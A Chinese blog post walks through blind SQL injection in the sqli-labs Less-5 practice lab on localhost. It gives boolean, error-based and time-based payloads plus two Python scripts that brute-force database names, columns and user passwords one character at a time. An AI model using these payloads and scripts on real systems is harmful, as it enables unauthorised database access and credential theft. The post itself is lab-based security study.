<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,SQL," />





  <link rel="alternate" href="/atom.xml" title="JWYBlog" type="application/atom+xml" />






<meta name="description" content="前言上一次我们讲了最基础的联合查询，眼看就来到了Less-5了，这里我接触了更加摸不着头脑的盲注，不过这也让小萌新的我好奇心倍增，那么就让我们一起走进盲注的世界吧，感受一下一脸懵逼的感觉。 盲注及其分类盲注什么是盲注呢？盲注就是在SQL注入过程中，当执行完SQL语句是，我们所查询的数据没办法回显到我们的前端页面，这是我们就只能构造一些逻辑判断来猜解，这个过程就是盲注啦哈哈哈哈（废话一堆）。 分类">
<meta name="keywords" content="CTF,SQL">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL-LABS入门到放弃2（part1）">
<meta property="og:url" content="http://ju5tw4nty0u.top/2018/03/17/SQL-LABS入门到放弃2（part1）/index.html">
<meta property="og:site_name" content="JWYBlog">
<meta property="og:description" content="前言上一次我们讲了最基础的联合查询，眼看就来到了Less-5了，这里我接触了更加摸不着头脑的盲注，不过这也让小萌新的我好奇心倍增，那么就让我们一起走进盲注的世界吧，感受一下一脸懵逼的感觉。 盲注及其分类盲注什么是盲注呢？盲注就是在SQL注入过程中，当执行完SQL语句是，我们所查询的数据没办法回显到我们的前端页面，这是我们就只能构造一些逻辑判断来猜解，这个过程就是盲注啦哈哈哈哈（废话一堆）。 分类">
<meta property="og:updated_time" content="2018-03-23T06:00:36.301Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL-LABS入门到放弃2（part1）">
<meta name="twitter:description" content="前言上一次我们讲了最基础的联合查询，眼看就来到了Less-5了，这里我接触了更加摸不着头脑的盲注，不过这也让小萌新的我好奇心倍增，那么就让我们一起走进盲注的世界吧，感受一下一脸懵逼的感觉。 盲注及其分类盲注什么是盲注呢？盲注就是在SQL注入过程中，当执行完SQL语句是，我们所查询的数据没办法回显到我们的前端页面，这是我们就只能构造一些逻辑判断来猜解，这个过程就是盲注啦哈哈哈哈（废话一堆）。 分类">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://ju5tw4nty0u.top/2018/03/17/SQL-LABS入门到放弃2（part1）/"/>





  <title>SQL-LABS入门到放弃2（part1） | JWYBlog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">JWYBlog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-主页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            主页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于我">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-留言板">
          <a href="/guestbook" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-newspaper-o"></i> <br />
            
            留言板
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            recherche
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://ju5tw4nty0u.top/2018/03/17/SQL-LABS入门到放弃2（part1）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ju5tw4nty0u">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/headlogo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="JWYBlog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL-LABS入门到放弃2（part1）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posté le</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-03-17T19:51:21+08:00">
                2018-03-17
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2018/03/17/SQL-LABS入门到放弃2（part1）/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2018/03/17/SQL-LABS入门到放弃2（part1）/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2018/03/17/SQL-LABS入门到放弃2（part1）/" class="leancloud_visitors" data-flag-title="SQL-LABS入门到放弃2（part1）">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  2,675
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>上一次我们讲了最基础的联合查询，眼看就来到了Less-5了，这里我接触了更加摸不着头脑的盲注，不过这也让小萌新的我好奇心倍增，那么就让我们一起走进盲注的世界吧，感受一下一脸懵逼的感觉。</p>
<h1 id="盲注及其分类"><a href="#盲注及其分类" class="headerlink" title="盲注及其分类"></a>盲注及其分类</h1><h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><p>什么是盲注呢？盲注就是在SQL注入过程中，当执行完SQL语句是，我们所查询的数据没办法回显到我们的前端页面，这是我们就只能构造一些逻辑判断来猜解，这个过程就是盲注啦哈哈哈哈（废话一堆）。</p>
<h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><ul>
<li><p>基于布尔的盲注（构造逻辑判断）</p>
<ul>
<li>利用left()函数</li>
<li>利用substr（）、ascii（）函数</li>
<li>利用regexp</li>
<li>利用ord（）、mid（）函数</li>
</ul>
</li>
<li><p>基于时间的盲注（延时注入）</p>
<ul>
<li>sleep（）函数</li>
<li>benchmark()函数</li>
</ul>
</li>
<li><p>基于报错的盲注（构造payload让信息通过错误提示回显）</p>
<ul>
<li>concat()、floor（）、rand（）、group by</li>
<li>exp()</li>
<li>bigint</li>
<li>extractvalue()</li>
<li>updatexml()</li>
<li>重复特性<br>光看这些就有点懵了，还是通过关卡实践吧，慢慢理解…</li>
</ul>
</li>
</ul>
<h2 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h2><h3 id="ascii函数"><a href="#ascii函数" class="headerlink" title="ascii函数"></a>ascii函数</h3><p>返回字符的ASCII值</p>
<h3 id="substr函数"><a href="#substr函数" class="headerlink" title="substr函数"></a>substr函数</h3><p>同mid函数，参数有3个</p>
<pre><code>* 提取的字段
* 开始位置
* 返回的字符数
</code></pre><h3 id="left函数"><a href="#left函数" class="headerlink" title="left函数"></a>left函数</h3><p>得到字符串的左部指定个数的字符，有2个参数：</p>
<pre><code>* 要截取的字符串
* 长度
</code></pre><h3 id="mid函数"><a href="#mid函数" class="headerlink" title="mid函数"></a>mid函数</h3><p>截取字符串，参数有3个：</p>
<pre><code>* 提取的字段
* 开始位置
* 返回的字符数
</code></pre><h3 id="ord函数"><a href="#ord函数" class="headerlink" title="ord函数"></a>ord函数</h3><p>同ascii函数，返回字符的ASCII值</p>
<h3 id="sleep函数"><a href="#sleep函数" class="headerlink" title="sleep函数"></a>sleep函数</h3><p>表示延时。</p>
<h1 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h1><h2 id="基于布尔"><a href="#基于布尔" class="headerlink" title="基于布尔"></a>基于布尔</h2><h3 id="ascii-substr-mid-ord"><a href="#ascii-substr-mid-ord" class="headerlink" title="ascii substr mid ord"></a>ascii substr mid ord</h3><ol>
<li>输入<code>id=1&#39;</code>报错<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">the right syntax to use near &apos;&apos;1&apos;&apos; LIMIT 0,1&apos; at line 1</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>说明sql语句中对id的处理为<code>id=&#39;1&#39;</code></p>
<ol>
<li>找到了注入点，我们可以使用ASCII和SUBSTR函数进行盲注，构造逻辑条件，根据是否回显<code>You are in...........</code>来确认所要查询的字符</li>
<li><p>查询数据库：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))&lt;111)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查询表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;),1,1))&gt;111)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查询字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=&apos;users&apos;),1,1))&lt;111)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查询字段值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(ascii(substr((select group_concat(username) from users),1,1))&lt;111)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>这里将ascii换成ord函数，讲substr换成mid函数效果是一样的</p>
</li>
<li>附上自己写的脚本<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import re</span><br><span class="line">import urllib</span><br><span class="line">import urllib2</span><br><span class="line">flag = &quot;&quot;</span><br><span class="line"></span><br><span class="line">for i in range(1,50):</span><br><span class="line">	for j in range(33,127):</span><br><span class="line">		#url = &quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1%27and%20ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;--+&quot;</span><br><span class="line">		url = &quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1%27and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;--+&quot;</span><br><span class="line">		#url = &quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1%27and%20ascii(substr((select%20group_concat(username)%20from%20users),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;--+&quot;</span><br><span class="line">		#url = &quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1%27and%20ascii(substr((select%20group_concat(password)%20from%20users),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;--+&quot;</span><br><span class="line">		req = urllib2.Request(url)</span><br><span class="line">		res_data = urllib2.urlopen(req)</span><br><span class="line">		res = res_data.read()</span><br><span class="line">		s = &apos;You are in...........&apos;</span><br><span class="line">		print res</span><br><span class="line">		if s in res:</span><br><span class="line">			flag +=chr(j)</span><br><span class="line">			print flag</span><br><span class="line">			break</span><br><span class="line"></span><br><span class="line">print &apos;over！！！&apos;</span><br><span class="line">print flag</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="left-length"><a href="#left-length" class="headerlink" title="left length"></a>left length</h3><ol>
<li><p>判断数据库长度</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(length(database())&lt;10)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(left(database(),1)=&apos;u&apos;)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查表名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)=&apos;e&apos;)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查列名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(left((select group_concat(column_name) from information_schema.columns where table_name=&apos;users&apos;),2)=&apos;id&apos;)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>查字段值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and 1=(left((select group_concat(username) from users),2)=&apos;du&apos;)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>在写脚本的时候发现left匹配的时候大小写不区分，所以这里爆破出来的都是大写的字符，需要结合其他函数做一个ascii值的转换，这样才能准确判断出来。</p>
</li>
</ol>
<h3 id="regexp"><a href="#regexp" class="headerlink" title="regexp"></a>regexp</h3><p>此方法暂时没完全理解，等啥时候懂了再总结。QAQ太菜了自己感觉！！</p>
<h2 id="基于报错"><a href="#基于报错" class="headerlink" title="基于报错"></a>基于报错</h2><h3 id="count、-floor、-rand、-group-by"><a href="#count、-floor、-rand、-group-by" class="headerlink" title="count、 floor、 rand、 group by"></a>count、 floor、 rand、 group by</h3><ol>
<li>函数简介</li>
</ol>
<ul>
<li><code>rand()</code>：用于产生一个0-1的随机数</li>
<li><code>floor（）</code>：向下取整</li>
<li><code>floor(rand(0)*2)</code>：将rand函数随机生成的数向下取整，因为<code>*2</code>，所以结果为0或者1</li>
<li><code>concat()</code>：将符合条件的同一列的不同行进行拼接，加入0x3a是为了方便观察</li>
<li><code>group by</code>：根据规则分组</li>
<li><code>count()</code>：统计元组个数</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*),concat(0x3a,0x3a,user(),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+</span><br></pre></td></tr></table></figure>
<ol>
<li><p>当前用户、版本、数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>所有数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>所有表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>字段值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>这里参考了<br><a href="http://blog.51cto.com/wt7315/1891458" target="_blank" rel="noopener">http://blog.51cto.com/wt7315/1891458</a><br><a href="https://www.cnblogs.com/xishaonian/p/6227405.html" target="_blank" rel="noopener">https://www.cnblogs.com/xishaonian/p/6227405.html</a></p>
<h3 id="double数字类型超出范围报错"><a href="#double数字类型超出范围报错" class="headerlink" title="double数字类型超出范围报错"></a>double数字类型超出范围报错</h3><ol>
<li><p>所有数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select (exp(~(select * from (select schema_name from information_schema.schemata limit 0,1)a))),2,3--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>所有表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select (exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a))),2,3--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>所有字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select (exp(~(select * from (select column_name from information_schema.columns where table_name=&apos;users&apos; limit 1,1)a))),2,3--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>以此类推，模板为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select (exp(~(select * from (查询语句)a))),2,3--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="bigint溢出"><a href="#bigint溢出" class="headerlink" title="bigint溢出"></a>bigint溢出</h3><ol>
<li><p>查询字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select (!(select * from (select column_name from information_schema.columns where table_name=&apos;users&apos; limit 1,1)x) - ~0),2,3--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>模板为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select (!(select * from (查询语句)x) - ~0),2,3--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="xpath-extractvalue-updatexml"><a href="#xpath-extractvalue-updatexml" class="headerlink" title="xpath  (extractvalue\updatexml)"></a>xpath  (extractvalue\updatexml)</h3><ol>
<li><p>查询字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">extractvalue:</span><br><span class="line">?id=1&apos; and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=&apos;users&apos; limit 2,1),0x7e))--+</span><br><span class="line"></span><br><span class="line">updatexml:</span><br><span class="line">?id=1&apos; and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=&apos;users&apos; limit 2,1),0x7e),1)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>extractvalue模板为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and extractvalue(1,concat(0x7e,(查询语句),0x7e))--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>updatexml模板为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and updatexml(1,concat(0x7e,(查询语句),0x7e),1)--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="数据的重复性报错"><a href="#数据的重复性报错" class="headerlink" title="数据的重复性报错"></a>数据的重复性报错</h3><ol>
<li><p>查询字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+</span><br></pre></td></tr></table></figure>
</li>
<li><p>模板：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; union select 1,2,3 from (select NAME_CONST((语句),1),NAME_CONST((语句),1))x --+</span><br></pre></td></tr></table></figure>
</li>
<li><p>注意事项</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">name_const(name,value)：返回给定值，</span><br><span class="line">当用来产生一个结果集合列时， name_const()促使该列使用给定名称</span><br><span class="line">但他的使用范围受限，只适用于一些数据库版本高于5.0.12，</span><br><span class="line">但又稍旧的版本，像现在的5.7版本就不用想了...然而我用的就是较新的版本，</span><br><span class="line">注入只能显示数据库的版本信息，想要查询其他的信息，</span><br><span class="line">会显示Incorrect arguments to NAME_CONST</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h2 id="基于时间"><a href="#基于时间" class="headerlink" title="基于时间"></a>基于时间</h2><h3 id="sleep"><a href="#sleep" class="headerlink" title="sleep"></a>sleep</h3><ol>
<li><p>当前数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and if ((ascii(substr(database(),1,1))=115),1,sleep(5))--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>所有数据库名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and if ((ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=115),sleep(5),1)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>表名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and if ((ascii(substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,1))=10),sleep(5),1)--+</span><br></pre></td></tr></table></figure>
</li>
<li><p>以此类推</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and if ((ascii(substr((语句),1,1))=101),sleep(5),1)--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>这里我将if的两个参数互换了一下位置，这样错误的时候不会延迟，但是页面返回的是正确时的页面，正确的时候会延迟五秒后响应，这样能够节省爆破时间。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">flag = &apos;&apos;</span><br><span class="line">for i in range(1,100):</span><br><span class="line">	for j in range(33,127):</span><br><span class="line">		start = time.time()</span><br><span class="line">		#print n</span><br><span class="line">		#print start</span><br><span class="line">		url1 = &quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1&apos; and if ((ascii(substr((select group_concat(schema_name) from information_schema.schemata),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;),sleep(5),1)--+&quot;</span><br><span class="line">		#print url</span><br><span class="line">		#url1 = &quot;http://127.0.0.1/sqli-labs-master/Less-5/index.php?id=1&apos; and if ((ascii(substr((select group_concat(username) from users),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;),1,sleep(5))--+&quot;</span><br><span class="line">		r = requests.get(url=url1)</span><br><span class="line">		over = time.time()</span><br><span class="line">		#print over</span><br><span class="line">		</span><br><span class="line">		print over - start</span><br><span class="line">		print &apos;---------------&apos;</span><br><span class="line">		if over - start &gt; 4:</span><br><span class="line">			flag += chr(j)</span><br><span class="line">			print flag</span><br><span class="line">			break</span><br><span class="line">print flag</span><br></pre></td></tr></table></figure></p>
<h3 id="benchmark"><a href="#benchmark" class="headerlink" title="benchmark"></a>benchmark</h3><ol>
<li>BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的cpu资源。推荐使用sleep() </li>
